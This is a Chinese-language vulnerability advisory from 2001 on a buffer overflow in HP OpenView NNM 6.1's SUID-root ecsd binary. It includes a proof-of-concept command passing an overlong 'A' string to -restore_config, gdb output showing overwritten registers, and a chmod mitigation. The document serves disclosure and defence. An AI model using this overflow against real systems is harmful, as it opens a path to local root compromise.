HP OpenView NNM v6.1 存在缓冲溢出漏洞

发布时间：2001-05-24
更新时间：2001-05-24
严重程度：高
威胁程度：本地管理员权限
错误类型：输入验证错误
利用方式：服务器模式

受影响系统

HP OpenView NNM v6.1

详细描述
HP OpenView NNM v6.1 的/opt/OV/bin/ecsd是一个SUID-ROOT
文件，其中存在缓冲溢出漏洞。ECSD不用于NNM，不过是附带
而且以suid-root属性默认安装。

测试代码
je@openview~> uname -a
SunOS openview 5.8 Generic_108528-07 sun4u sparc SUNW,UltraSPARC-IIi-Engine
je@openview~> ls -la /opt/OV/bin/ecsd
-r-sr-xr-x 1 root bin 2953640 maj 18 11:20 /opt/OV/bin/ecsd
je@openview~> pwd
/
je@openview~> /opt/OV/bin/ecsd -restore_config `perl -e 'print "A"x312'`
Failed to restore engine
configuration; "//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[snip..]" not found.
je@openview~> /opt/OV/bin/ecsd -restore_config `perl -e 'print "A"x313'`
Segmentation fault (core dumped)
je@openview~> gdb /opt/OV/bin/ecsd --core=core
[snip..]
Core was generated by `/opt/OV/bin/ecsd -restore_config AAAAAAAA[snip..]'.
[snip..]
#0 0x28eb8 in main ()
(gdb) inf reg
[snip..]
l1 0x41414141 1094795585
l2 0x41414141 1094795585
l3 0x41414141 1094795585
l4 0x41414141 1094795585
l5 0x41414141 1094795585
l6 0x41414141 1094795585
l7 0x41414141 1094795585
i0 0x41414141 1094795585
i1 0x41414141 1094795585
i2 0x41414141 1094795585
i3 0x41414141 1094795585
i4 0x41414141 1094795585
i5 0x41414141 1094795585
fp 0x41410028 1094778920
[snip..]
(gdb)

解决方案
临时方法：
chmod -s /opt/OV/bin/ecsd

相关信息
Jonas Eriksson (je@sekure.net)

最近严重漏洞

HP OpenView NNM v6.1 存在缓冲溢出漏洞